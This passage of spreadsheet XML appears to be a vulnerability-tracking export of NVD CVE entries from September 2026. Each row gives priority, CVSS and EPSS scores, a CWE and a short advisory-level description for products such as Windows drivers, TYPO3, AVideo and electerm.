          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79377</t>
        </is>
      </c>
    </row>
    <row r="794">
      <c r="A794" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B794" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C794" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79378</t>
        </is>
      </c>
      <c r="D794" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E794" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F794" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G794" s="5" t="inlineStr"/>
      <c r="H794" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I794" s="5" t="inlineStr"/>
      <c r="J794" s="5" t="inlineStr"/>
      <c r="K794" s="5" t="inlineStr"/>
      <c r="L794" s="5" t="inlineStr"/>
      <c r="M794" s="5" t="inlineStr"/>
      <c r="N794" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O794" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P794" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q794" s="5" t="inlineStr"/>
      <c r="R794" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S794" s="5" t="inlineStr">
        <is>
          <t>An issue in the btm_acl_handle() function of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t>
        </is>
      </c>
      <c r="T794" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79378</t>
        </is>
      </c>
    </row>
    <row r="795">
      <c r="A795" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B795" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C795" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79572</t>
        </is>
      </c>
      <c r="D795" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E795" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F795" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G795" s="5" t="inlineStr"/>
      <c r="H795" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I795" s="5" t="inlineStr"/>
      <c r="J795" s="5" t="inlineStr"/>
      <c r="K795" s="5" t="inlineStr"/>
      <c r="L795" s="5" t="inlineStr"/>
      <c r="M795" s="5" t="inlineStr"/>
      <c r="N795" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O795" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P795" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q795" s="5" t="inlineStr"/>
      <c r="R795" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="S795" s="5" t="inlineStr">
        <is>
          <t>An XXE (XML External Entity) vulnerability in the level-rule module of Distribution Management v1.0.0 allows attackers to read sensitive files, scan internal networks, or launch server attacks via supplying a crafted XML payload.</t>
        </is>
      </c>
      <c r="T795" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79572</t>
        </is>
      </c>
    </row>
    <row r="796">
      <c r="A796" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B796" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C796" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79575</t>
        </is>
      </c>
      <c r="D796" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E796" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F796" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G796" s="5" t="inlineStr"/>
      <c r="H796" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I796" s="5" t="inlineStr"/>
      <c r="J796" s="5" t="inlineStr"/>
      <c r="K796" s="5" t="inlineStr"/>
      <c r="L796" s="5" t="inlineStr"/>
      <c r="M796" s="5" t="inlineStr"/>
      <c r="N796" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O796" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P796" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q796" s="5" t="inlineStr"/>
      <c r="R796" s="5" t="inlineStr">
        <is>
          <t>CWE-330</t>
        </is>
      </c>
      <c r="S796" s="5" t="inlineStr">
        <is>
          <t>The JWT signing secret in yfexam-exam v2.0 is derived from the username and the current month instead of a random server-side key, making the secret key easily obtainable via a bruteforce attack.</t>
        </is>
      </c>
      <c r="T796" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79575</t>
        </is>
      </c>
    </row>
    <row r="797">
      <c r="A797" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B797" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C797" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81355</t>
        </is>
      </c>
      <c r="D797" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E797" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F797" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G797" s="5" t="inlineStr"/>
      <c r="H797" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I797" s="5" t="inlineStr"/>
      <c r="J797" s="5" t="inlineStr"/>
      <c r="K797" s="5" t="inlineStr"/>
      <c r="L797" s="5" t="inlineStr"/>
      <c r="M797" s="5" t="inlineStr"/>
      <c r="N797" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O797" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P797" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q797" s="5" t="inlineStr"/>
      <c r="R797" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S797" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T797" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81355</t>
        </is>
      </c>
    </row>
    <row r="798">
      <c r="A798" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B798" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C798" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81381</t>
        </is>
      </c>
      <c r="D798" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E798" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F798" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G798" s="5" t="inlineStr"/>
      <c r="H798" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I798" s="5" t="inlineStr"/>
      <c r="J798" s="5" t="inlineStr"/>
      <c r="K798" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L798" s="5" t="inlineStr"/>
      <c r="M798" s="5" t="inlineStr"/>
      <c r="N798" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O798" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P798" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q798" s="5" t="inlineStr"/>
      <c r="R798" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="S798" s="5" t="inlineStr">
        <is>
          <t>Insufficiently protected credentials in GitHub Copilot and Visual Studio Code allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T798" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81381</t>
        </is>
      </c>
    </row>
    <row r="799">
      <c r="A799" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B799" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C799" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81790</t>
        </is>
      </c>
      <c r="D799" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E799" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F799" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G799" s="5" t="inlineStr"/>
      <c r="H799" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I799" s="5" t="inlineStr"/>
      <c r="J799" s="5" t="inlineStr"/>
      <c r="K799" s="5" t="inlineStr"/>
      <c r="L799" s="5" t="inlineStr"/>
      <c r="M799" s="5" t="inlineStr"/>
      <c r="N799" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O799" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P799" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q799" s="5" t="inlineStr"/>
      <c r="R799" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S799" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization vulnerability in Viszt Péter Csomagpontok és szállítási címkék WooCommerce-hez allows Exploiting Incorrectly Configured Access Control Security Levels.
This issue affects Csomagpontok és szállítási címkék WooCommerce-hez: from n/a before 4.2.8.</t>
        </is>
      </c>
      <c r="T799" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81790</t>
        </is>
      </c>
    </row>
    <row r="800">
      <c r="A800" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B800" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C800" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83989</t>
        </is>
      </c>
      <c r="D800" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E800" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F800" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G800" s="5" t="inlineStr"/>
      <c r="H800" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I800" s="5" t="inlineStr"/>
      <c r="J800" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K80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0" s="5" t="inlineStr"/>
      <c r="M800" s="5" t="inlineStr"/>
      <c r="N800" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O800" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P800" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q800" s="5" t="inlineStr"/>
      <c r="R800" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S800" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T800" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83989</t>
        </is>
      </c>
    </row>
    <row r="801">
      <c r="A801" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B801" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C801" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84001</t>
        </is>
      </c>
      <c r="D801" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E801" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F801" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G801" s="5" t="inlineStr"/>
      <c r="H801" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I801" s="5" t="inlineStr"/>
      <c r="J801" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K80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1" s="5" t="inlineStr"/>
      <c r="M801" s="5" t="inlineStr"/>
      <c r="N801" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O801" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P801" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q801" s="5" t="inlineStr"/>
      <c r="R801" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S801" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Key Distribution Center allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T801" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84001</t>
        </is>
      </c>
    </row>
    <row r="802">
      <c r="A802" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B802" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C802" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85400</t>
        </is>
      </c>
      <c r="D802" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E802" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F802" s="5" t="inlineStr">
        <is>
          <t>f4fb688c-4412-4426-b4b8-421ecf27b14a</t>
        </is>
      </c>
      <c r="G802" s="5" t="inlineStr"/>
      <c r="H802" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I802" s="5" t="inlineStr"/>
      <c r="J802" s="5" t="inlineStr"/>
      <c r="K802" s="5" t="inlineStr"/>
      <c r="L802" s="5" t="inlineStr"/>
      <c r="M802" s="5" t="inlineStr"/>
      <c r="N802" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O802" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P802" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q802" s="5" t="inlineStr"/>
      <c r="R802" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-862</t>
        </is>
      </c>
      <c r="S802" s="5" t="inlineStr">
        <is>
          <t>Backend administrators without system maintainer privileges were able to schedule any of the configuration:read, configuration:set, and configuration:show commands. This allowed them to modify arbitrary system configuration, which is normally limited to system maintainers. As a consequence, this allowed them, for example, to gain system maintainer privileges or cause a denial of service. Exploiting this vulnerability requires an administrator-level backend user account. This issue affects TYPO3 CMS versions 14.2.0-14.3.6.</t>
        </is>
      </c>
      <c r="T802" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85400</t>
        </is>
      </c>
    </row>
    <row r="803">
      <c r="A803" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B803" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C803" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86075</t>
        </is>
      </c>
      <c r="D803" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E803" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F803" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G803" s="5" t="inlineStr"/>
      <c r="H803" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I803" s="5" t="inlineStr"/>
      <c r="J803" s="5" t="inlineStr"/>
      <c r="K803" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="L803" s="5" t="inlineStr"/>
      <c r="M803" s="5" t="inlineStr"/>
      <c r="N803" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O803" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P803" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q803" s="5" t="inlineStr"/>
      <c r="R803" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S803" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T803" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86075</t>
        </is>
      </c>
    </row>
    <row r="804">
      <c r="A804" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B804" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C804" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86711</t>
        </is>
      </c>
      <c r="D804" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E804" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F804" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G804" s="5" t="inlineStr"/>
      <c r="H804" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I804" s="5" t="inlineStr"/>
      <c r="J804" s="5" t="inlineStr"/>
      <c r="K804" s="5" t="inlineStr"/>
      <c r="L804" s="5" t="inlineStr"/>
      <c r="M804" s="5" t="inlineStr"/>
      <c r="N804" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O804" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P804" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q804" s="5" t="inlineStr"/>
      <c r="R804" s="5" t="inlineStr">
        <is>
          <t>CWE-749</t>
        </is>
      </c>
      <c r="S804" s="5" t="inlineStr">
        <is>
          <t>electerm before 5.3.15 exposes 40+ main-process functions through an unvalidated Electron IPC handler with no function-name allowlist or sender validation. Renderer-side script execution can invoke openFileWithEditor and other functions with arbitrary arguments to execute system commands in the main process.</t>
        </is>
      </c>
      <c r="T804" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86711</t>
        </is>
      </c>
    </row>
    <row r="805">
      <c r="A805" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B805" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C805" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86721</t>
        </is>
      </c>
      <c r="D805" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E805" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F805" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G805" s="5" t="inlineStr"/>
      <c r="H805" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I805" s="5" t="inlineStr"/>
      <c r="J805" s="5" t="inlineStr"/>
      <c r="K805" s="5" t="inlineStr"/>
      <c r="L805" s="5" t="inlineStr"/>
      <c r="M805" s="5" t="inlineStr"/>
      <c r="N805" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O805" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P805" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q805" s="5" t="inlineStr"/>
      <c r="R805" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S805" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c contains an authorization bypass vulnerability where a session cookie named 'key' with value 'value' overrides the $_REQUEST['key'] parameter in saveLive.php and related endpoints. Attackers can publish to any user's RTMP stream without authentication by using the known constant stream key value to hijack live broadcasts.</t>
        </is>
      </c>
      <c r="T805" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86721</t>
        </is>
      </c>
    </row>
    <row r="806">
      <c r="A806" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B806" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C806" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86728</t>
        </is>
      </c>
      <c r="D806" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E806" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F806" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G806" s="5" t="inlineStr"/>
      <c r="H806" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I806" s="5" t="inlineStr"/>
      <c r="J806" s="5" t="inlineStr"/>
      <c r="K806" s="5" t="inlineStr"/>
      <c r="L806" s="5" t="inlineStr"/>
      <c r="M806" s="5" t="inlineStr"/>
      <c r="N806" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O806" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P806" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q806" s="5" t="inlineStr"/>
      <c r="R806" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S806" s="5" t="inlineStr">
        <is>
          <t>AVideo through 29.0 contains an authentication bypass vulnerability in plugin/PlayLists/epg.json.php that exposes live-stream keys and private EPG schedules to unauthenticated users. Attackers can request the endpoint with sequential user or playlist IDs to retrieve sensitive credentials, server identifiers, and complete programme schedules without authentication.</t>
        </is>
      </c>
      <c r="T806" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86728</t>
        </is>
      </c>
    </row>
    <row r="807">
      <c r="A807" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B807" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C807" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19651</t>
        </is>
      </c>
      <c r="D807" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E807" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F807" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G807" s="5" t="inlineStr"/>
      <c r="H807" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I807" s="5" t="inlineStr"/>
      <c r="J807" s="5" t="inlineStr"/>
      <c r="K807" s="5" t="inlineStr"/>
      <c r="L807" s="5" t="inlineStr"/>
      <c r="M807" s="5" t="inlineStr"/>
      <c r="N807" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O807" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P807" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q807" s="5" t="inlineStr"/>
      <c r="R807" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S807" s="5" t="inlineStr">
        <is>
          <t>IBM Enterprise Build of Quarkus 3.27.1 through 3.27.5, and 3.33.1 through 3.33.3  could allow an attacker to bypass authorization by manipulating URL query parameters due to incorrect mapping of values to untrusted query string input.</t>
        </is>
      </c>
      <c r="T807" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19651</t>
        </is>
      </c>
    </row>
    <row r="808">
      <c r="A808" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B808" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C808" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69347</t>
        </is>
      </c>
      <c r="D808" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E808" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F808" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G808" s="5" t="inlineStr"/>
      <c r="H808" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I808" s="5" t="inlineStr"/>
      <c r="J808" s="5" t="inlineStr"/>
      <c r="K808" s="5" t="inlineStr"/>
      <c r="L808" s="5" t="inlineStr"/>
      <c r="M808" s="5" t="inlineStr"/>
      <c r="N808" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O808" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P808" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q808" s="5" t="inlineStr"/>
      <c r="R808" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S808" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T808" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69347</t>
        </is>
      </c>
    </row>
    <row r="809">
      <c r="A809" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B809" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C809" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71375</t>
        </is>
      </c>
      <c r="D809" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E809" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F809" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G809" s="5" t="inlineStr"/>
      <c r="H809" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I809" s="5" t="inlineStr"/>
      <c r="J809" s="5" t="inlineStr"/>
      <c r="K809" s="5" t="inlineStr"/>
      <c r="L809" s="5" t="inlineStr"/>
      <c r="M809" s="5" t="inlineStr"/>
      <c r="N809" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O809" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P809" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q809" s="5" t="inlineStr"/>
      <c r="R809" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="S809" s="5" t="inlineStr">
        <is>
          <t>Improper restriction of XML external entity reference vulnerability in Cosminexus Component Container.
This issue affects Cosminexus Component Container: from 11-70-01 before 11-70-03, from 11-60 before 11-60-03, from 11-50 through 11-50-03, from 11-40 through 11-40-03, from 11-30 through 11-30-08, from 11-20 before 11-20-10, from 11-10 through 11-10-11, from 11-00 before 11-00-13, from 09-87 before 09-87-10, from 09-80 before 09-80-05, from 09-70 before 09-70-28, from 09-50 through 09-50-22, and from 09-00 through 09-00-18.</t>
        </is>
      </c>
      <c r="T809" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71375</t>
        </is>
      </c>
    </row>
    <row r="810">
      <c r="A810" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B810" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C810" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76196</t>
        </is>
      </c>
      <c r="D810" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E810" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F810" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G810" s="5" t="inlineStr"/>
      <c r="H810" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I810" s="5" t="inlineStr"/>
      <c r="J810" s="5" t="inlineStr"/>
      <c r="K810" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop_mobile</t>
        </is>
      </c>
      <c r="L810" s="5" t="inlineStr"/>
      <c r="M810" s="5" t="inlineStr"/>
      <c r="N810" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O810" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
